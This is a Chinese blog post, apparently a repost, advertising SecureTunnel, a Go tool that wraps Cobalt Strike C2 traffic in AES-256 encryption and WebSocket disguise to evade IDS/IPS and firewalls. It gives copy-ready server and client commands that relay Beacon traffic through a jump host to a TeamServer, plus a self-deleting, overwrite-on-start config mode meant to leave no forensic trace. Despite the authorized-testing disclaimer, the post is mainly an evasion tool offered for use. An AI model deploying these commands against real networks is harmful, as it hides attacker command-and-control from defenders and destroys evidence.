文章总结： SecureTunnel是一款基于Go的C2流量加密隧道工具，专为红队规避IDS/IPS检测设计。它支持AES-256加密与WebSocket流量伪装，可隐藏CobaltStrike指纹。工具具备配置自毁与IP白名单功能，确保通信隐蔽安全，适合授权渗透测试。 综合评分： 82 文章分类： 红队,安全工具,内网渗透,渗透测试,免杀

SecureTunnel | 一款专业的 C2 流量加密隧道工具

原创

abc_123

SecurityPaper

2025年12月15日 21:29 江苏

🔐 SecureTunnel | 一款专业的 C2 流量加密隧道工具

轻松规避 IDS/IPS 检测，让你的 C2 流量隐于无形

📌 工具简介

SecureTunnel 是一款基于 Go 语言开发的C2流量加密，流量转发隧道工具，专为红队行动设计。

🎯 应用场景

• 🛡️ 规避流量检测 – 加密 C2 通信，绕过 IDS/IPS/WAF 特征检测
• 🔍 对抗流量分析 – 消除 CobaltStrike 等工具的流量指纹
• 🌐 穿透防火墙 – WebSocket 模式伪装成正常 Web 流量
• 🎭 隐蔽通信 – 自定义路径，伪装成合法 API 请求

✨ 核心优势

| 优势 | 说明 | | — | — | | 🔒 军工级加密 | AES-256-CFB 流加密，每包随机 IV | | 🌊 流量伪装 | WebSocket 模式，流量特征与正常 Web 无异 | | 📄 阅后即焚 | 配置文件启动后自动销毁，不留痕迹 | | 🛡️ 访问控制 | IP 黑白名单，防止恶意爆破 | | ⚡ 高性能 | Go 协程并发，轻松处理上千连接 | | 🖥️ 跨平台 | Windows / Linux / macOS 全支持 |

🚀 快速上手

1️⃣ 基础模式（TCP 加密隧道）

Server 端 (VPS)：

./tunnel -mode server -listen 0.0.0.0:8888 -target 127.0.0.1:50050 -password"MyPass123"

Client 端 (跳板机)：

./tunnel -mode client -listen127.0.0.1:443 -server vps.com:8888 -password"MyPass123"

2️⃣ WebSocket 模式（强烈推荐 🔥）

流量伪装成正常 WebSocket 通信，有效规避深度包检测：

# Server - 伪装成 API 接口
./tunnel -mode server -listen0.0.0.0:443 -target127.0.0.1:50050 -password"MyPass"-ws-ws-path /api/v1/stream

# Client
./tunnel -mode client -listen127.0.0.1:443 -server vps.com:443 -password"MyPass"-ws-ws-path /api/v1/stream

client端

server端

流量侧，cobalstrike流量为webSocet协议加密流量

cobalstrike端，命令执行正常

3️⃣ 配置文件模式

# 生成配置文件
./tunnel -gen-config config.yaml

# 启动后自动删除配置文件 (不留痕迹)
./tunnel -config config.yaml -delete-config

# 安全删除 (覆写后删除，防止数据恢复)
./tunnel -config config.yaml -secure-delete

4️⃣ IP 白名单（防止爆破）

./tunnel -mode server -listen 0.0.0.0:8888 -target 127.0.0.1:50050 -password"MyPass" -acl-acl-mode whitelist -acl-whitelist"192.168.1.0/24,10.0.0.1"

📋 参数速查

| 参数 | 说明 | | — | — | | -mode | server / client | | -listen | 监听地址 | | -target | 目标地址 | | -server | Server 地址 (Client 用) | | -password | 加密密码 | | -ws | 启用 WebSocket (推荐) | | -ws-path | WebSocket 路径 | | -config | 配置文件路径 | | -delete-config | 启动后删除配置 | | -secure-delete | 安全删除配置 | | -acl | 启用访问控制 | | -acl-whitelist | IP 白名单 |

🎯 部署架构

┌──────────┐      ┌──────────┐      ┌──────────┐      ┌────────────┐
│  Beacon  │ ───▶ │  Client  │ ═══▶ │  Server  │ ───▶ │ TeamServer │
│  (目标)  │      │ (跳板机) │      │  (VPS)   │      │   (C2)     │
└──────────┘      └──────────┘      └──────────┘      └────────────┘
   HTTP/S              │                  │              TCP
                       └─ AES-256 加密 ───┘
                         (规避检测)

🔧 编译

# Windows
go build -ldflags="-s -w"-o tunnel.exe ./cmd/tunnel

# Linux
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w"-o tunnel_linux ./cmd/tunnel

⚠️ 免责声明： 本工具仅供授权安全测试使用，请遵守相关法律法规。

🔔 关注我们，获取更多红队工具！

#红队工具 #流量加密 #规避检测 #CobaltStrike

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：SecurityPaper abc_123《SecureTunnel | 一款专业的 C2 流量加密隧道工具》